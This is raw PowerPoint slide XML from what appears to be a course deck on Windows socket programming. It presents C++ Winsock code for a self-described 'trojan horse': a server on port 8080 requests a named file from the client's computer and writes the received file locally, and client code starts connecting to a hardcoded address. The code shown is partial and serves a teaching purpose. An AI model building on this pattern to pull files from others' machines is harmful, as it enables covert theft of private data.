              <a:t>int WSAAPI connect(</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SOCKET         s,</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const sockaddr *name,</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  [in] int            namelen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="5657850" y="1552575"/>
            <a:ext cx="5451475" cy="1898015"/>
            <a:chOff x="10137" y="2445"/>
            <a:chExt cx="8585" cy="2989"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="圆角矩形标注 3"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10170" y="2445"/>
              <a:ext cx="8519" cy="2989"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -64813"/>
                <a:gd name="adj2" fmla="val -1890"/>
                <a:gd name="adj3" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="07A7AF">
                <a:alpha val="5000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="07A7A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Text Box 30" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030352c5c2274656d706c61746549645c223a32303233313534347d220a7d0a"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10137" y="2850"/>
              <a:ext cx="8585" cy="2179"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr marL="720090" indent="-539750" algn="l" fontAlgn="auto">
                <a:buSzPct val="150000"/>
                <a:buBlip>
                  <a:blip r:embed="rId5"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>The connect function establishes a connection to a specified socket.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"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118171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Example</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="32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78" name="折角形 377"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955040" y="1355090"/>
            <a:ext cx="10281920" cy="3158490"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 18909"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="152400" dist="38100" dir="5400000" algn="t" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>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379" name="任意多边形 378"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1050290" y="1355090"/>
            <a:ext cx="428625" cy="368935"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1500"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1449"/>
              <a:gd name="connsiteX1" fmla="*/ 1500 w 1500"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1449"/>
              <a:gd name="connsiteX2" fmla="*/ 1500 w 1500"/>
              <a:gd name="connsiteY2" fmla="*/ 1449 h 1449"/>
              <a:gd name="connsiteX3" fmla="*/ 768 w 1500"/>
              <a:gd name="connsiteY3" fmla="*/ 1098 h 1449"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1500"/>
              <a:gd name="connsiteY4" fmla="*/ 1449 h 1449"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 1500"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 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 h="1449">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1500" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1500" y="1449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="768" y="1098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="07A7AF"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:srgbClr val="005CA2">
              <a:shade val="50000"/>
            </a:srgbClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:srgbClr val="005CA2"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:srgbClr val="005CA2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:sysClr val="window" lastClr="FFFFFF"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Box 8" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030362c5c2274656d706c61746549645c223a32303233313437387d222c0a20202020227461726765744964223a202270726f636573734f6e6c696e6542756c6c6574220a7d0a"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="915035" y="1840230"/>
            <a:ext cx="10260965" cy="236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charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="4572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charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="9144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charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="13716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charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr b="1" kern="1200">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑 Light" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr b="1" kern="1200">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑 Light" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr b="1" kern="1200">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑 Light" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr b="1" kern="1200">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑 Light" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr b="1" kern="1200">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑 Light" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:lnSpc>
                <a:spcPts val="4300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId4"/>
              </a:buBlip>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="-150" checksum="1568234514"/>
                  <wpsdc:marlchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="250" checksum="1039213347"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="微软雅黑 Light" charset="-122"/>
              </a:rPr>
              <a:t>The trojan horse is trying to establish connection between client and server. Then the server request a certain file from the client which will be written to the local memory in the server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="微软雅黑 Light" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="2378 [转换]"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="-644" r="84596" b="8932"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="236220" y="4841875"/>
            <a:ext cx="1157605" cy="162052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Server-create socket and listen to client</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45720" y="960755"/>
            <a:ext cx="12108180" cy="10478770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="07A7AF">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>int main()</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WSADATA wsas; //The WSADATA structure contains information about the Windows Sockets implementation.</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int error;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WORD ver;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ver = MAKEWORD(1, 1);</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error = WSAStartup(ver, &amp;wsas); //The WSAStartup function initiates the use of the Windows Sockets DLL by a process.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if (error != 0)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WSACleanup();</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return -1;</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SOCKET server;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server = socket(AF_INET, SOCK_STREAM, 0); //The socket function creates a socket that is bound to a specific transport service provider.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if (server == INVALID_SOCKET)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WSACleanup();</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return -2;</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struct sockaddr_in sa; //The SOCKADDR_IN structure specifies a transport address and port for the AF_INET address family.</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memset((void *)(&amp;sa), 0, sizeof(sa));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>    sa.sin_family = AF_INET;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>    sa.sin_port = htons(8080);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>    sa.sin_addr.s_addr = htonl(INADDR_ANY);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t> //The htonl function converts a u_long from host to TCP/IP network byte order. INADDR_ANY:not bind a socket to any specific IP</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error = bind(server, (struct sockaddr FAR*)&amp;sa, sizeof(sa))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>; //The bind function associates a local address with a socket.</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if (error == SOCKET_ERROR)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WSACleanup();</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return -3;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listen(server, 5)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>; //The listen function places a socket in a state in which it is listening for an incoming connection.</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std::cout &lt;&lt; "Server listening..." &lt;&lt; std::endl;</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while (true)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SOCKET client;</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struct sockaddr_in sockaddr;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int size;</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size = sizeof(sockaddr);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std::string fileName;</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std::cout &lt;&lt; "Waiting for connections..." &lt;&lt; std::endl;</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client = accept(server, (struct sockaddr FAR*)&amp;sockaddr, &amp;size)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>; //The accept function permits an incoming connection attempt on a socket.</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std::cout &lt;&lt; "Client connected" &lt;&lt; std::endl;</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std::cout &lt;&lt; "Type in file name to search on client's computer" &lt;&lt; std::endl;</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std::cin &gt;&gt; fileName</a:t>
            </a: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clientData *data = new clientData;</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data-&gt;socket = client</a:t>
            </a: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data-&gt;fileName = fileName</a:t>
            </a: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unsigned int threadID;</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r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>HANDLE hThread = (HANDLE)_beginthreadex(NULL, 0, &amp;clientSession, (void*)data, 0, &amp;threadID)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>; //Creates a thread and run clientSession.</a:t>
            </a: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closesocket(server);</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WSACleanup();</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    return 0;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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015625 -0.708519 " pathEditMode="relative" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6"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ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="07A7AF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Server-receive the content and write to local</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210820" y="1132205"/>
            <a:ext cx="11927205" cy="7768590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>typedef struct data{</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SOCKET socket;</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std::string fileName;</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clientData;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pP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this function is used to write the message from the client to an authorized file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unsigned int __stdcall clientSession(void *data)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clientData *client = (clientData*)data;</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//TODO clientSession body</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pP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send(client-&gt;socket, client-&gt;fileName.c_str(), client-&gt;fileName.length(), 0)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>; //The send function sends data on a connected socket.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pP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char buffer[4096];</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FILE *file = fopen(client-&gt;fileName.c_str(), "wb");</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if (file != nullptr) {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long received;</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bool started = false;</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while ((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>received = recv(client-&gt;socket, buffer, 4096, 0)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>) &gt; 0) { //The recv function receives data from a connected socket or a bound connectionless socket.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pP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fwrite(buffer, 1, received, file)</a:t>
            </a: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if (!started)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std::cout &lt;&lt; "Receiving..." &lt;&lt; std::endl;</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started = true;</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fclose(file);</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if (started)</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std::cout &lt;&lt; "File received" &lt;&lt; std::endl;</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else</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std::cout &lt;&lt; "Error receiving the file" &lt;&lt; std::endl;</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closesocket(client-&gt;socket);</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delete client;</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    return 0;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pP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5.20833e-05 -0.409444 " pathEditMode="relative" rAng="0" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="1" y="-2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Client-build connection, receive file name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95250" y="1036955"/>
            <a:ext cx="12002135" cy="8728075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>int main()</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WSADATA wsas;</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int error;</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WORD ver;</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ver = MAKEWORD(2, 0);</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error = WSAStartup(ver, &amp;wsas);</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if (error != 0) {</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WSACleanup();</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return -1;</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SOCKET server;</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server = socket(AF_INET, SOCK_STREAM, 0);</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if (server == INVALID_SOCKET) {</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WSACleanup();</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return -2;</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struct sockaddr_in sa;</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memset((void *)(&amp;sa), 0, sizeof(sa));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	sa.sin_family = AF_INET;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	sa.sin_port = htons(8080);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	sa.sin_addr.s_addr = inet_addr("192.168.0.16");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
